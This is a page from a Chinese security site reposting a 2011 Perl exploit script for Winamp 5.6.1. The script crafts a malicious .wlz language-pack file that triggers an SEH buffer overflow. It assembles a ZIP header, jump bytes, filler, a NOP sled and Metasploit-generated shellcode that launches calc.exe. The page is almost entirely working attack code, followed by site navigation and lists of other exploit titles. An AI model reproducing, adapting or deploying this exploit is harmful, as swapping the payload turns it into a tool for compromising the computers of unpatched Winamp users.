首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winamp 5.6.1 Install Language SEH Overflow
来源:ked-h@hotmail.com 作者:KedAns-Dz 发布时间:2011-04-13  
#!/usr/bin/perl

# ---------
# Winamp <=5.6.1 Install Language SEH Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
# ---------
# In Winamp 5.6.1 Install New Language with (.wlz) file
# and In File (.wlz) can Inclusion SEH for Installing ...
my $header = 
"\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\x2f\x92\x7b\x3d\xd3\x55".
"\x30\x92\x00\x28\x00\x00\x00\x28\x00\x00\x08\x00\x00\x00\x61\x75".
"\x74\x68\x2e\x6c\x6e\x67";
my $jump = "\xeb\x06\x90\x90" ; # short jump
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/exec - 224 bytes (http://www.metasploit.com)
# EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor
my $shell = 
"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x26\x7e\x29\x35\x83\xee\xfc\xe2\xf4\xda\x96\xa0\x35" .
"\x26\x7e\x49\xbc\xc3\x4f\xfb\x51\xad\x2c\x19\xbe\x74\x72" .
"\xa2\x67\x32\xf5\x5b\x1d\x29\xc9\x63\x13\x17\x81\x18\xf5" .
"\x8a\x42\x48\x49\x24\x52\x09\xf4\xe9\x73\x28\xf2\xc4\x8e" .
"\x7b\x62\xad\x2c\x39\xbe\x64\x42\x28\xe5\xad\x3e\x51\xb0" .
"\xe6\x0a\x63\x34\xf6\x2e\xa2\x7d\x3e\xf5\x71\x15\x27\xad" .
"\xca\x09\x6f\xf5\x1d\xbe\x27\xa8\x18\xca\x17\xbe\x85\xf4" .
"\xe9\x73\x28\xf2\x1e\x9e\x5c\xc1\x25\x03\xd1\x0e\x5b\x5a" .
"\x5c\xd7\x7e\xf5\x71\x11\x27\xad\x4f\xbe\x2a\x35\xa2\x6d" .
"\x3a\x7f\xfa\xbe\x22\xf5\x28\xe5\xaf\x3a\x0d\x11\x7d\x25" .
"\x48\x6c\x7c\x2f\xd6\xd5\x7e\x21\x73\xbe\x34\x95\xaf\x68" .
"\x4c\x7f\xa4\xb0\x9f\x7e\x29\x35\x76\x16\x18\xbe\x49\xf9" .
"\xd6\xe0\x9d\x80\x27\x07\xcc\x16\x8f\xa0\x9b\xe3\xd6\xe0" .
"\x1a\x78\x55\x3f\xa6\x85\xc9\x40\x23\xc5\x6e\x26\x54\x11" .
"\x43\x35\x75\x81\xfc\x56\x47\x12\x4a\x1b\x43\x06\x4c\x35";
my $exploit = $header.$jump.$junk.$jump.$shell.$nops; 
open(myfile,'>>ar-dz.wlz');
print myfile $exploit;
close (myfile);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·tmux '-S' Option Incorrect Set
·Winamp 5.6.1 .m3u8 Buffer Over
·Vallen Zipper V2.30 .ZIP File
·VeryTools Video Spirit Pro <=
·VeryTools Video Spirit Pro 1.7
·Cisco Security Agent Managemen
·OpenText FirstClass Client v 1
·Wordtrainer 3.0 .ORD File Buff
·Microsoft HTML Help <= 6.1 Sta
·Microsoft Host Integration Ser
·Real Networks Arcade Games Stu
·Microsoft Reader <= 2.1.1.3143
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved